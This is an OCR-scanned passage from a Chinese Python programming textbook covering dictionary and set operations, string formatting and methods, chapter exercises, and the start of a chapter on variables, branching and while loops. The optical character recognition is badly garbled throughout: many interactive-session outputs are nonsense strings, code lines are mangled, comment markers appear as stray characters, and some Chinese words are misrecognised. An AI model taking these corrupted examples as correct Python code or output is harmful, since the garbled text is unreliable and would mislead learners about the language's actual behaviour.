可 以 根据 字典 的 键 来 修改 指定 键 的 值 , 也 可 以 为 字典 添加 新 的 “ 键 : 值 "对 。 例 如 : 


>>> dict_a[ 'name'] = ' 王 五 ' 
>>> dict a 


2. 添加 元 素 


>>> dict_a[ 'address'] = ' 大 连 市 ' 
>>> dict a 
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使 用 update() 方 法 可 以 将 另 一 字典 全 部 元 素 添加 到 当前 字典 中 。 
>>> dict_b 

ta) 

>>> dict_c 

a 


>>> dict b. update(dict c) 
>>> dict b 


0 ,i eh 


3. 删除 操作 
1) 删除 字典 元 素 
使 用 del 命令 删除 字典 元 素 。 


>>> del dict_a[ 'address'] 
>>> dict a 


{'age': 18, 'sex': 'male'，'name': ' 王 五 '，'married': False} 


使 用 pop() 方 法 返回 并 删除 字典 元 素 。 

>>> dict_b 

{Da a el 

>>> dict_b. pop( 'b') 

4 

>>> dict_b 

ee De ee) 

使 用 popitem() 方 法 返回 并 删除 一 个 “ 键 : 值 ? 对 ,这 里 的 返回 并 删除 是 随机 的 ,为 什么 


是 随机 的 呢 ? 因 为 字典 是 无 序 的 ,没有 所 谓 的 “最 后 一 项 ”或 是 其 他 顺序 ,实际 上 ,总 是 删除 
前 面 的 元 素 。 在 工作 时 如 果 遇 到 需要 逐一 删除 项 的 工作 ,用 popitem() 方 法 效率 很 高 。 


>>> dict_b 
ee Pe be? 
>>> dict_b. popitem() 


('a', 3) 


可 以 使 用 clear() 方 法 清除 字典 的 所 有 元 素 。 


>>> dict a.clear() 
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>>> dict a 


0 


2) 删除 字典 
可 以 使 用 del 命令 删除 字典 。 


>>> del dict a 


2.4.4 与 字典 有 关 的 计算 


上 文 介绍 了 与 列表 ,元 组 有 关 的 计算 ,如 max、min、sum 等 ,但 这 些 计 算 在 字典 里 面 有 
些 特 殊 , 这 里 来 讨论 一 下 。 

对 字典 求 最 大 值 . 最 小 值 .和 等 操作 都 是 对 键 进行 的 。 例 如 : 

>>p> dict_i ={'a':l,'b': -5,'c':11,'d':0, 'e':57, 'f':132} 

>>> max(dict i) 


5 


>>> min(dict i) 


a 


而 现实 中 ,如 果 和 希望 对 字典 的 值 进行 运算 ,那么 如 何 做 呢 ? 通过 values() 方 法 枚 举 出 所 
有 值 ,然后 再 运算 就 如 自己 所 愿 了 。 


>>> max(dict_i.values()) 


132 
>>> min(dict i.values()) 
= 
>>> sum( dict_i.values()) 


196 


字典 理论 是 无 序 的 ,如 果 要 想 根据 值 对 字典 排序 ,该 如 何 做 呢 ? Python 中 内 置 了 一 个 
collections 模块 ,里 面 有 一 个 OrderedDict 类 ,可 以 对 值 进行 排序 。 例 如 : 


>>> from collections import OrderedDict 
>>> items = ( 
('c', 1), 
('a', 2), 
('B', 3) 
) 
>>> regular dict = dict(items) 
>>> ordered dict = OrderedDict(items) 
>>> for k, v in regular dict. items() : 
print( k, v) 
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>>> for k, v in ordered dict. items() : 


print( k, v) 


en 
A2 
B3 


2.5 集 合 


集合 是 基本 的 数学 概念 ,是 具有 某 种 特性 的 事物 的 整体 ,或 者 是 一 些 确认 对 象 的 汇集 。 
构成 集合 的 事物 或 对 象 称 作 元 素 或 是 成 员 。Python 中 的 集合 是 具有 排他 性 的 无 序 的 元 素 
的 集合 ,使 用 大 括号 作为 分 界 符 , 元 素 之 间 用 逗号 分 开 。 集 合 分 为 可 变 集合 和 不 可 变 
集合 。 


2.5.1 集合 的 创建 
与 列表 ,元 组 .字典 等 类 似 ,通过 = 直接 把 集合 赋值 给 变量 ,从 而 创建 一 个 集合 型 变量 。 


>>> set a = {1,3,5,7,9,11} 
>>> Set_a 


{1, 3, 5, 7, 9, 11} 
>>> typel( set _ a) 


<class 'set> 


也 可 以 使 用 set() 方 法 创建 ,如 : 


>>> set_b= set([2,4,6,8,10]) 
>>> set_b 


dr 27 04 6} 


>>> set_c= set((—1,2,34,56,87,0, - 12)) 
>> Set_c 
3 


>>> set d = set(range(1,13,2)) 
>>> set _d 





ee Pp Re 


>>> set_e= set('Hello') 
>>> set ee 


>>> set_f = frozenset('How are you?') 井 创建 了 一 个 不 可 变 集 合 
>>> set 上 


>>> type(set_f) 


2.5.2 集合 的 更 新 
用 集合 内 建 的 方法 和 操作 符 可 以 添加 或 删除 集合 的 成 员 。 


>>> set_a.add(13) 
>>> set a 


>>> set_f£.add( 'b') 井 不 可 变 集合 不 可 更 新 


>>> set_e.update( 'world') 
>>> set_e 


>>> set_a. remove(9) 
>>> Set_a 


>>> set_a.pop() 


>>> set_a 


>>> set_a.pop() 


>>> set a 


>>> set a. pop(11) # pop( ) 不 接收 参数 ,传递 参数 则 出 错 
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Traceback (most recent call last): 
File "<pyshell# 50>", line 1, in<module> 
set a.pop(11) 
TypeError: pop() takes no arguments (1 given) 


>>> set_a. discard(5) # 从 集合 中 删除 对 象 5, 仅 适 用 于 可 变 集合 
>>> set a 

[TS 

>>> set_e.clear() # 清空 集合 中 的 元 素 

del set e 井 删除 整个 集合 


2.5.3 集合 的 运算 
Python 中 的 集合 的 运算 与 数学 意义 上 的 运算 相 一 致 ,主要 有 以 下 运算 。 
1. 判断 是 否 为 集合 的 成 员 


>>> set_a 


i | 


>>> 1 in set a 


False 


>>> 3 not in set a 


True 


2. 集合 的 等 价 与 不 等 价 


>>> Set_a 

A 3 

>>> set d 

ti 237 57 TO 1} 
>>> set a== set_d 
False 

>>> set a!= set_d 


True 


3. 子 集 或 超 集 
集合 中 用 “二 ”一 二 ”运算 符 或 issubset() 方 法 来 判断 是 否 子 集 ,用 “二 ”二 二 ”运算 符 
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或 issuperset() 方 法 来 判断 是 否 超 集 。 


>>> set('Hello')< set('Hello world') 


>>> set('Hello world'")> = set( 'Hello') 


>>> set('Hello'). issubset(set('Hello world')) 


>>> set('Hello world'). issuperset(set('Hello')) 


4. 并 运算 (| 或 union()) 


>>> set a 


>>> set_d 


>>> set a| set d 


>>> set _a. union(set d) 井 union( ) 为 集合 的 内 置 方 法 , 求 集合 的 并 集 


5. 交 运 算 (& 或 intersection()) 


>>> set ag&set d 


>>> set_a. intersection(set_d) 并 intersection( ) 为 集合 的 内 置 方法 , 求 集合 的 交集 


6. 差 集 ( 一 或 difference()) 


>>> set d - set a 


>>> set_d. difference( set a) 井 difference( ) 为 集合 的 内 置 方法 , 求 集合 的 差 集 
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7. 对 称 差 (^ 或 symmetric_difference()) 
>>> set a^ set d 
(3 5 oS) 
>>> set_a. symmetric difference(set_d) 井 symmetric_difference() 为 集合 的 内 置 方法 , 求 集合 的 
对 称 差 


er ep el 


剖 提 示 : 利用 集合 简便 提取 序列 中 不 重复 元 素 。 
利用 集合 的 元 素 不 重复 的 特性 ,可 以 非常 简单 地 提取 出 序列 中 不 重复 的 元 素 。 


>>> list a= [1,2,3,4,2,4,6,7,9] 
>>> set norepeat = set(list a) 
>>> Set_norepeat 
和 


2.6 字 符 串 


字符 串 是 Python 中 最 常见 的 数据 类 型 ,通过 单 引号 、 双 引号 和 三 引号 (字符 串 两 边 各 
有 三 个 单 引号 或 双 引 号 ) 来 表示 字符 串 。 如 : 

>>> strl = 'this is the first string. 

>>> str2 = "this is the second string." 

学 习 过 C 语言 的 朋友 都 知道 ,在 单 引 号 与 双 引 号 表示 的 字符 串 中 很 难 表示 制 表 符 、 回 
车 .引号 等 ,为 了 在 字符 串 中 表示 这 种 我 们 还 需要 、 但 表示 又 比较 困难 的 符号 ,在 字符 串 中 引 
和 信 了 转 义 符 “\”, 常 见 的 转 义 符 如 表 2-2 所 示 。 

表 2-2 常见 的 转 义 符 









































\( 在 行 尾 时 ) 续 行 符 \v 纵向 制 表 符 

\\ 反 斜 杠 符号 Nt 横向 制 表 符 

单 引 号 \r 回 车 

NY 双 引 号 \f 换 页 

Na 响 铃 No 八进制 数 yy 代表 的 字符 , 例 
\b 退 格 (Backspace) 如 ,\ol2 代表 换行 

\e 转 义 Na 十 六 进 制 数 yy 代表 的 字符 ， 
\000 空 例如 ,\x0a 代表 换行 

\n 换行 \other 其 他 的 字符 以 普通 格式 输出 
如 : 

>>> str3 = 'It\'sa cat' 


>>> print(str3) 


It'sacat 
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>>> str4 = " 简 ` 爱 曾 说 过 : "人 活着 就 是 为 了 含辛茹苦 。'\n 我 可 不 这 么 认为 ,我 的 信条 是 : ' 快 快乐 乐 
过 好 每 二 天 。” 
>>> print(str4) 


简 ` 爱 曾 说 过 : ' 人 活着 就 是 为 了 含辛茹苦 。' 
我 可 不 这 么 认为 ,我 的 信条 是 : ' 快 快乐 乐 过 好 每 一 天 。" 


str5 = '"' 床 前 明月 光 ， 
疑 是 地 上 和 霜 。 
举 头 望 明月 ， 
低头 思 故 乡 。 


>>> print(str5) 


床 前 明月 光 ， 
疑 是 地 上 霜 。 
举 头 望 明月 ， 
低头 思 故 乡 。 


三 引号 都 可 以 表示 字符 串 ,只 


从 上 面 的 例子 可 以 看 出 ,在 Python 中 , 单 引号 、 双 引号 、 
三 引号 主要 用 于 表达 较 长 的 字符 串 ,在 


马 
要 它们 成 对 出 现 , 中 间 可 以 再 出 现 其 他 类 型 的 引号 。 三 引 
三 引号 内 的 字符 串 可 以 包括 回 车 等 特殊 字符 串 。 


2.6.1 字符 串 的 格式 化 


1.“% 格 式 符 ” 格 式 化 
Python 中 字符 串 是 不 可 更 改 的 序列 ,在 程序 中 需要 进行 字符 串 的 运算 ,这 时 就 需要 进 
行 字符 串 的 格式 化 。 格 式 化 是 以 “%” 开 头 加 格式 字符 组 成 ,字符 串 格 式 化 的 一 般 形 式 为 
% 口中 [m] [n] 格式 字符 '% x 


人 待 转换 的 表达 式 
(2) 格式 运算 符 
(3) 指定 类 型 


(4) 指定 精度 

(5) 指定 最 小 宽度 

(6) 指定 空位 填 0 

(7) 对 正 数 加 正 号 

(8) 指定 左 对 齐 输出 

(9) 格式 标志 ， 表 示 格式 开始 


号 
号 

















Python 支持 的 常见 格式 字符 如 表 2-3 所 示 。 
表 2-3 Python 支持 的 常见 格式 字符 
































格 式 说 明 格 式 说 明 

%e 字符 与 编码 %s 字符 串 

%d 整数 %nu 无 符号 整数 

%o 八进制 数 Hx/ HX 十 六 进 制 数 

%{/WF 浮 点 数 , 可 指定 小 数位 数 We/ WE 科学 计数 法 格式 化 浮 点 数 

%i 十 进 制 整 数 %g 或 G 浮 点 数字 (根据 值 的 大 小 采用 %e 或 %D 
%% 字符 % 
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下 面 举例 说 明 字符 串 格 式 的 使 用 。 


>>> a=520 
>>"%i"sSa 


"520" 


>>"%d"s$%a 





"520'， 

>>> "$ +5d" %a # 指 定数 据 宽 度 为 5 位 ,并 对 正 数 前 面 加 "+" 
"+520， 

>>"% 一 5d"g%a # 指定 数据 宽度 为 5 位 ,并 左 对 齐 

号 20 忆 


>"%x"%a 

"208 

>>"%o"%a 

'1010" 

>>"%f"s%a 

"520.000000" 

>>"%e"s%a 

'5.200000e + 02' 

>>>"%s, %c"%(65,65) # 使 用 元 组 作为 字符 串 和 字符 的 参数 


557M 

字符 串 格式 化 时 可 以 指定 其 最 小 宽度 和 精度 ( 即 小 数位 数 ) 。 
>>"%5d"%a 

"520’ 


>>> b= 3.1415926535898 
>>> "要 10.7f" %b # 指 定 最 小 宽度 时 ,包括 小 数 点 ,不 足 则 以 空格 补 齐 


"3.1415927’ 


2. .format() 格 式 化 
Python 3 引入 了 sth. format() 函 数 进行 格式 化 ,功能 要 比 “% 操 作 符 ”强大 许多 。 字 符 串 中 





用 {) 来 表示 占 位 符 , 可 以 用 数字 序号 ,关键 字 或 属性 名 来 表示 位 置 顺序 。 下 面 举例 说 明 。 


>>> '{0}, {1}'.format(' 张 三 ', 18) # 通 过 序号 传 参数 
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' 张 三 ,18' 
>>> '{1}, {0}'.format(' 张 三 ', 18) 井 改变 序号 位 置 也 就 改变 了 字符 串 顺序 
ey 
>>> "{},{}".format(" 张 三 ",18) # 空 序号 传 参数 
=A. 
>>> '{name}, {age} '. format (name = ' 张 三 ',age = 18) 井 通过 关键 字 传 参 数 
这 三 38” 
>>> stu=[' 张 三 ',18] 
>>> '{0[0]}, {0[1]}'. format(stu) # 通 过 下 标 传递 参数 
号 三 8 


>>> a=520 
>>> b= 20184 
>>> "a= {a},b= {b}".format( * * locals()) 


'a= 520,b= 20184" 


对 本 地 变量 进行 格式 化 ,locals() 枚 举 本 地 变量 。 
>>> dict = {'name': ' 李 四 ', 'address': ' 大 连 市 '} 
>>> 'name = {name},address = {address}'. format( * * dict) # 根 据 字典 的 键 输出 其 值 


'name = 李 四 ,address = 大 连 市 ' 


填充 与 对 齐 。 

Python 的 format 格式 化 中 可 以 设置 填充 与 对 齐 方式 。 

^、 所 .> 分 别 是 居中 \ 左 对 齐 . 右 对 齐 , 后 面 带宽 度 。 

:后 面 带 填充 的 字符 ,只 能 是 一 个 字符 ,不 指定 则 使 用 默认 的 空格 进行 填充 。 


比如 : 

>> "{:>5}". format(520) # 指 定 右 对 齐 , 宽度 为 5 个 字符 
S20 

>>> "{:0>5}". format(520) 井 指定 右 对 齐 ,5 个 字符 宽度 ,以 0 填充 
"00520， 

>> "{: ¥>5}".format(520) # 指定 右 对 齐 ,5 个 字符 宽 , 以 至 填充 
'¥ ¥520' 

>> "{:5d}". format(520) # 指 定 为 整数 ,宽度 为 5 个 字符 


”5207 
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>>> "{:8.5f}".format(3.1415926535898) 井 指定 为 浮 点 数 ,宽度 为 8 个 字符 ,小 数 为 5 位 


"3.14159， 
>>> "{:b}j".format(19) 井 指定 为 二 进 制 

'10011' 

>>> "{:0}". format(19) # 指定 为 八进制 

,23， 

>>> "{:x}". format(19) # 指定 为 十 六 进 制 

13 

>>> '{:,}'.format(10001) # 用 有 逗号 做 金额 的 千 位 分 隔 符 
'10, 001' 


2.6.2 字符 串 常用 方法 

Python 提供 了 大 量 的 函数 对 字符 串 进行 操作 ,通过 dir("") 可 以 查看 Python 内 置 的 支 
持 字符 串 的 函数 ,下 面 就 简单 介绍 一 下 字符 串 的 常用 方法 。 

1. find() 函 数 

find() 函数 的 语法 格式 为 


s. find(substr[, start][,end]) 


该 函数 的 功能 是 查找 字符 串 中 的 子 串 , 若 找到 则 返回 子 串 的 位 置 ; 若 未 找到 则 返回 
= 


>>>" 枯 藤 老 树 昏 鸦 , 小 桥 流水 人 家 ,古道 西风 瘦 马 。 夕 阳 西 下 ,断肠 人 在 天 涯 。".find( "小 桥 ') 


7 


>>> "peach, 桃子 ; banana, 香 楷 ; ".find( "banana') 


9 

从 本 例 可 以 看 出 ,Python 3 中 英文 与 中 文字 符 都 只 占 一 个 字符 位 。 
>>> "peach, 桃子 ; banana, 香花; ".find('banana', 4,8) 

i 

2. split() 函 数 

split() 函数 的 语法 格式 为 


str. split(sep = None, maxsplit = —1) 


该 函数 用 指定 的 字符 把 字符 串 分 割 成 若干 个 子 字符 串 ,并 返回 一 个 列表 。 
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>>> fruit = "apple, banana, orange, peach" 
>>> fruit. split(',') 


['apple', 'banana', 'orange', 'peach'] 
>>> fruit. split(',', maxsplit = 1) 井 指定 最 大 分 割 次 数 为 1 次 


['apple', 'banana, orange, peach'] 


若 未 指定 分 隔 符 , 则 以 字符 中 的 任意 空白 符号 (包括 空格 、 换 行 符 和 制 表 符 等 ) 进 行 
分 割 。 


>>> astr = "My name is TOM, \n What's your name?" 
>>> astr. split() 


['My', 'name', 'is', 'TOM,', "What's", 'your', 'name?'] 


3. join() 函 数 
join() 函数 的 功能 与 split() 函数 正好 相反 , 它 把 若干 个 字符 串 连 接 起 来 ,并 在 子 字符 串 
之 间 插 入 指定 的 字符 。 


>>> 11 = ['my', 'name' 'is', 'Tom'] 
> ' .join(1i) 


"my name is Tom 


Python 中 还 可 以 用 ”十 ?连接 字符 串 ,但 其 效率 较 低 ,建议 使 用 join() 函 数 。 


>>> fruitl = "apple'" 

>>> fruit2 = "banana' 

>>> fruit3 = "orange' 

>>> fruits = fruitl+ ' "+ fruit2 + '，'+ fruit3 
>>> fruits 


'apple, banana, orange' 


4. lower() 函 数 
lower() 函数 将 输入 的 大 写字 母 转 换 为 小 写 。 


>>> s= "I Love Python Language!" 
>>> s_lower = s. lower() 
>>> s_lower 


'i love python language!' 


5. upper() 函 数 
upper() 函数 将 输入 的 字母 转换 为 大 写 。 


>>> s_upper = s.upper() 
>>> s_upper 
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'I LOVE PYTHON LANGUAGE! ' 


6. capitalize() 函 数 
capitalize() 函 数 将 字符 串 的 第 一 个 字母 转换 为 大 写 。 


>>> s_captital = s_lower.capitalize() 
>>> s_captital 


'I love python languagel! 


7. title() 函 数 
title() 函数 将 每 个 单词 的 首 字母 转换 为 大 写 。 


>>> s_title = s.title() 
>>> s_title 


并 Love Python Languagel ' 


8. replace() 函 数 
replace() 函数 实现 查找 替换 功能 。 返 回 原 字 符 串 中 所 有 匹配 项 都 被 蔡 换 之 后 得 到 的 新 
字符 串 。 


>>> sl = ' 我 爱 我 的 祖国 一 一 中 国 ' 
>>> s2 = sl. replace( ' 中 国 ', ' 中 华人 民 共 和 国 ') 
>>> s2 


' 我 爱 我 的 祖国 一 一 中 华人 民 共 和 国 ' 
9. str() 函 数 
str() 函 数 能 把 任意 对 象 转换 为 字符 串 。 


>>a=97.8 
>>> s= str(a) 
>>> s 


"DTD 
>>> str(2 + 3j) 


a 


10. float() 函 数 
float() 函数 能 够 把 字符 串 转换 为 浮 点 数 。 


>>> f= float(s) 
>>> 上 


97.8 


11. int 〇 函数 
int() 函数 能 将 字符 串 转 换 为 整数 。 


>>1i = int('123') 
>>1i 


123 
i = int(s) #s= '97.8', 转 换 出 错 


12. strip() ,rstrip() 与 lstrip() 函 数 
strip() 函数 去 除 字符 串 前 后 的 空格 或 指定 的 其 他 字符 ; rstrip() 函 数 去 除 字 符 串 右边 
的 空格 或 指定 的 其 他 字符 ; lstrip 〇 函数 去 除 字符 串 左 边 的 空格 或 指定 的 字符 串 。 


>>>b='I Love You! ' 
>>> b. strip() 


并 Love You! 
>>> b.rstrip() 


I Love Youl! 


SS 您 好 ======" 
>>> c. strip(' -= ') 
! 您 好 ' 


> eletrip('— "} 


>>> c.rstrip(' -= )) 


13. 关键 字 in 

关键 字 in 与 not in 用 来 判断 一 个 字符 串 是 否 出 现在 另 一 个 字符 串 中 。 
>>> 'love' in 'I love you' 

True 

>>> 'love' not in 'I love you' 


False 


14. isalpha() ,isdigit() 与 isalnum() 函 数 
判断 字符 串 是 否 是 字符 ,数字 字符 ,字符 或 数字 。 


>>> 'abcde'. isalpha() 
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True 

>>> '123456'. isalpha( ) 
False 

>>> 'al23'. isalpha() 
False 

>>> '123456'. isalnum( ) 
True 

>>> 'al23'. isalnum( ) 
True 

>>> 'abcde'. isalnum() 


True 


习 题 


一 、 判 断 题 

1. Python 序列 最 左边 元 素 的 下 标 为 1 。 

2. Python 序列 最 右边 元 素 的 下 标 为 一 1。 

3， Python 序列 下 标 可 以 用 正 向 位 置 编 号 ,也 可 以 用 反 向 位 置 编号 。 
4. Python 进行 数据 计算 时 ,会 自动 转换 数据 类 型 。 
5 
6 


i 
~ wv ww 


. 字典 中 的 键 的 值 是 可 以 更 改 的 。 
. 集合 中 的 元 素 是 可 以 重复 的 。 
二 、 选择 题 
1. Python 中 列表 用 ( ) 符 号 表示 。 
A.( ) BE 0 Bi 
2. Python 的 列表 添加 元 素 时 ,下 列 方法 错误 的 是 ( hs 
A. append() B. extend() C. insert() D. pop() 
3. Python 的 列表 删除 元 素 时 ,下 列 方法 错误 的 是 ( Ws 
A. cmp() B. del C. remove() D. pop() 


4. Python 的 列表 与 元 组 的 区 别 中 ,下 列 说 法 错误 的 是 ( ya 
A. 元 组 的 速度 比 列表 快 
B. 元 组 用 ( ) 表 示 , 列 表 用 [ ] 表 示 
C. 元 组 的 元 素 可 以 更 改 , 列 表 的 元 素 不 可 以 更 改 
D. 元 组 可 以 作为 字典 的 键 ,而 列表 不 可 以 
5. 下 列 运 算 符 中 级 别 最 高 的 是 ( Ns 
A. | B. & C. xx Be -= 
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6. 按 位 或 运算 符 是 (  )。 


A. | B. & Ls 本 一 
7. 客运 算 符 为 ( 和 

A, * 路 本 站 C. xx D. % 
8. 下 列 ( ) 不 是 有 效 的 变量 名 。 

A. myname 隘 . -二 C. list_a D. dict-b 
9. 下 列 符号 中 ( ) 不 可 以 作为 字符 串 的 定 界 符 。 

A B." Com D. [] 
10. 下 列 的 运算 符 中 ( ) 可 以 对 集合 进行 并 运算 。 

A. | B. & CG * D; ~ 
11. Python 字符 串 中 ,( ”) 表 示 转 义 符 。 

A.\ B:/ C. % D. # 
三 、 简 答题 
1. 简 述 Python 列表 添加 和 删除 元 素 的 方法 。 


2. 简 述 Python 中 遍历 字典 的 方法 。 
3. 简 述 两 个 集合 之 间 的 运算 关系 。 


在 第 2 章 中 已 经 介绍 了 常量 ,常见 的 数据 类 型 及 数据 结构 ,程序 设计 中 经 常用 到 的 还 有 
另 一 个 量 , 称 为 变量 ,变量 是 内 存 中 命名 的 存储 位 置 ,与 常量 不 同 之 处 在 于 常量 在 程序 运行 
过 程 中 是 不 变 的 ,而 变量 在 程序 运行 过 程 中 是 变化 的 。 比 如 : 


>>a=5 
>z>a=a+5 
>>> 
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a 就 是 变量 , 它 的 值 在 程序 运行 过 程 中 发 生 了 变化 ,那么 变量 的 使 用 有 何 规则 呢 ? 先 来 
探讨 一 下 。 

变量 的 命名 规则 如 下 。 

2 变量 名 由 字母 .数字 ,特殊 符号 组 成 。 

2 变量 名 的 第 1 个 字母 必须 是 字母 或 下 面 线 “_”。 

2 变量 名 是 区 分 大 小 写 的 。 

因此 ,a、b、var_a、a5、bl、name、price、myage 等 都 是 有 效 的 变量 名 ,但 1a( 第 1 个 字符 
为 数字 ) .My age( 中 间 有 空格 ) ,my 一 price( 中 间 含 有 减 号 ) 等 都 是 不 合法 的 变量 名 。 

由 于 Python 3 完美 地 支持 Unicode 编码 ,因此 .Python 3 中 中 文 可 以 作为 变量 名 ， 
例如 : 


>>> 年 龄 = 18 
>>> 年 龄 


18 


Python 中 不 用 声明 ,直接 给 变量 赋值 即 可 使 用 ,Python 会 根据 变量 的 值 自动 判断 变量 


的 类 型 。 
变量 的 赋值 : 


>>a = True 

>>b = 13.58 

>>> c = "这 是 字符 串 " 
>>d= b+128 


Python 中 可 以 一 次 对 多 个 变量 赋值 ,如 : 


>>> myname, myage = " 王 五 "，19 
>>> myname 


证 机 
>>> myage 


19 


Python 中 可 以 使 用 id( 变 量 名 ) 求 变量 的 内 存 地 址 ,如 : 
>>> id(a) 
1500529280 


>>f=a 
>>> id(f) 


1500529280 


>>>f = 1 
>>> id(f) 


1500886704 

>>> id(b) 

34051440 

>>> id(d) 

34052616 

通过 上 例 可 以 看 出 ,把 变量 a 赋值 给 另 一 变量 {后 ,id(a) 与 id(f) 是 相同 的 ; 执行 {=1 


赋值 运算 后 ,id(f)(1500886704) 与 id(a)(1500529280) 的 值 变 得 不 同 了 。 同 理 , 执 行 4 一 b 十 
128 运算 后 ,id(b)(34051440) 与 id(d)(34052616) 的 值 也 变 得 不 同 了 。 


3.2 分 支 结 构 


在 程序 设计 过 程 中 ,经 常会 有 这 样 的 情况 : 当 某 条 件 为 真 时 ,执行 一 个 代码 块 ,而 条 件 
为 假 时 执行 男 一 个 代码 块 。 这 就 是 程序 中 的 流程 控制 ,也 称 为 分 支 结 构 。Python 中 用 if/ 
else 实现 分 支 , 当 过后 面 的 条 件 表 达 式 为 真 时 ,执行 邻近 的 代码 块 ; 当 计 后 面 的 条 件 表达 式 


为 假 时 ,不 执行 邻近 的 代码 块 , 而 执行 else 后 面 的 代码 块 。 

3.2.1 单 分 支 结 构 

单 分 支 结构 只 有 一 个 if 条 件 表达 式 , 当 if 条 件 表达 式 为 真 时 ,执行 邻近 的 代码 块 ; 当 if 
条 件 表达 式 为 假 时 ,不 执行 邻近 的 代码 块 ,而 是 执行 代码 块 后 的 语句 ， 
如 图 3-1 所 示 。 


下 面 列举 根据 学 生 输入 分 数 给 出 成 绩 的 档次 。 
例 [ch3 2_1 if. py) 









语句 块 











井 coding:utf 一 8 
ss = input(" 请 输入 你 的 成 绩 (0 一 100):") 


si= int(ss) 图 3-1 单 分 支 结构 


i 

2 

下 

4 if si< 60: 

5. print(" 不 及 格 ") 
6 if si>= 60 and si<70: 
7 print(" 及 格 ") 

8. if 80> si>=70: 

9 print(" 中 ") 

10. if 90> si>= 80: 
FE print(" 良 ") 

12,. if si>= 90: 

13. print(" 优 ") 


表达 式 可 以 是 简单 的 式 子 ,也 可 以 是 多 个 式 子 的 组 合 ,用 and、or 将 多 个 式 子 连 接 起 来 ， 
也 可 以 用 not 取 反 ,例如 ,si 二 ==60 and si 一 70; 在 Python 中 还 可 以 用 80 二 si 二 =70 这 样 的 
式 子 表示 复杂 条 件 , 这 种 表示 方法 在 其 他 语言 中 语法 是 错误 的 。 


3.2.2 双 分 支 结构 


当 条 件 表达 式 为 真 时 ,执行 {f 后 的 代码 块 ; 当 条 件 表达 式 为 假 时 ,执行 else 后 的 代码 
块 ,如 图 3-2 所 示 。 


下 面 的 例子 根据 输入 分 数 , 判 断 是 否 及 格 。 
< 直 世 >> 例 [ch3_2_2ifelse. py] 



































一 外 1 14. #coding:utf -8 
语句 块 语句 块 2 15. ss = input(" 请 输入 分 数 (0~100):") 
16. si= int(ss) 
1 17. 证 si>=60: 
18. print(" 及 格 ") 
图 3-2” 双 分 支 结 构 0 ‘else 
20. print(" 不 及 格 ") 


3.2.3 多 分 支 结构 


多 分 支 结构 主要 用 于 处 理 多 个 条 件 ,在 不 同 的 条 件 下 执行 不 同 的 代码 块 。 在 其 他 语言 
中 有 switch/case 语句 ,在 Python 中 完全 用 让...elif... 语 句 就 可 以 实现 多 分 支 结 构 , 因 此 
Python 中 没有 switch/case 语句 。 下 面 还 以 将 分 数 转 换 为 等 级 为 例 ,说 明 多 分 支 结构 。 
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例 [ch3_2_3elif. py】 


1， 非 6odiagsaEF= 虽 

2. ss = input(" 请 输入 你 的 成 绩 (0 一 100): ") 
起 si= int(ss) 

4. if si<60: 
5 

6 

7 

8 


print(" 不 及 格 ") 
elif si<70: 
print(" 及 格 ") 
. elif si<80: 
9. print(" 中 ") 
10. elif si<90: 
3 print(" 良 ") 
12. elif si<=100: 
3; print(" 优 ") 


复杂 条 件 下 , 某 条 件 又 可 以 分 为 更 详细 的 子 条 件 , 怎 样 控制 复杂 条 件 下 的 程序 执行 呢 ? 
这 时 可 以 典 套 分 支 结构 来 表示 复杂 条 件 。 下 面 以 六 年 的 计算 为 例 ,说 明 分 支 的 艇 套 。 

输入 一 个 数字 年 份 , 求 该 年 份 是 否 为 半年 。 闽 年 的 判断 有 两 种 方法 : 能 被 4 整除 但 不 
能 被 100 整除 ; 或 能 被 400 整除 , 则 这 个 年 份 就 是 闵 年 。 

例 【[ch3_2_3year. py】 


#coding:utf -8 
syear = input(" 请 输入 年 份 : ") 
iyear = int(syear) 
if iyear %4 ==0 : 
if iyear %100 != 0: 
print(" 浆 年 ") 
else: 
print(" 平 年 ") 
else: 


0， print(" 平 年 ") 


Poowaouwwwb 


3.3 循环 结构 


循环 结构 是 程序 设计 中 非常 常见 的 一 种 结构 ,也 就 是 反复 执行 某 个 代码 块 的 结构 。 执 
行 数 学 计算 .事务 处 理 、 统 计 报 表 等 任务 时 ,需要 反复 执行 某 些 代码 ,这 时 就 可 以 使 用 循环 结 
构 , 例 如 , 求 1 十 2 十 … 十 100 的 值 ,需要 对 100 个 数 进行 累加 ,可 以 设计 一 个 代码 块 : 将 一 个 
数 加 到 表示 和 的 变量 ,反复 执行 这 个 代码 块 就 可 以 得 到 1 十 2 十 … 十 100 的 值 ,这 个 反复 执行 
的 结构 被 称 为 循环 结构 。 

循环 分 为 两 种 情况 : 循环 次 数 确定 的 循环 ; @ 循 环 次 数 不 确 定 的 循环 。Python 中 有 
while 和 for 两 种 循环 语句 ,其 中 while 循环 主要 用 于 次 数 不 确定 的 循环 ; for 循环 通常 用 于 
次 数 确 定 的 循环 。 


3.3.1 while 循环 
while 的 语法 结构 为 


【格式 一 】 

while 条 件 表 达 式 : 
循环 体 

【格式 二 】 

While 条 件 表达 式 : 
循环 体 

else: 
语句 体 


条 件 表达 式 为 逻辑 表达 式 , 当 条 件 表 达 式 为 真 时 ,执行 循环 体 ; 当 条 件 表达 式 为 假 时 ， 
就 会 退出 循环 ,执行 循环 体 后 面 的 语句 。 
1. 次 数 不 确 定 的 while 循环 
循环 体 需要 反复 执行 ,但 循环 次 数 无 法 确定 时 ,可 以 使 用 while 语句 。 比 如 ,将 输入 的 
整数 相 加 ,直至 输入 “# "为止 。 由 于 输入 数字 的 次 数 不 确 定 , 也 就 是 循环 的 次 数 不 确 定 , 这 
里 使 用 了 while 语句 。 
例 [ch3_3_1whilel.py】 
#coding:utf—8 
sum=0 


numstr = input(" 请 输入 一 个 整数 ('# ' 结 束 ): ") 


while numstr != "#": 


sum = sum + numint 
= input(" 请 输入 一 个 整数 ('# ' 结 束 ): ") 


numstr = 
print("sum = ", sum) 


1 
2 
3 
4. 
让 numint = int(numstr) 
6 
WW 
8 
进入 循环 体 时 ,首先 判断 numstr 是 否 不 等 于 # , 若 不 等 于 #, 则 进入 循环 体 ; 若 等 于 
# , 则 不 进入 循环 体 , 执 行 循环 体 后 面 的 print() 函 数 。 循 环 体 的 作用 是 将 刚 输入 的 字符 串 
型 数字 转换 为 数字 ,然后 将 该 数字 加 到 sum 变量 中 。 
2. 次 数 确定 的 while 循环 
while 当然 可 以 用 于 执行 次 数 确定 的 循环 ,这 时 就 需要 一 个 计数 器 (其 实 是 一 个 变量 )， 
当 到 达 某 个 值 时 ,就 退出 循环 。 例 如 , 求 1 十 2 十 … 十 100 的 和 。 
例 [ch3_3_1while2. py】 
1 #codign:utf—8 
2. sum=0 
3 
4. while i<=100: 
5 sum = sum+i 
6 i=i+1 
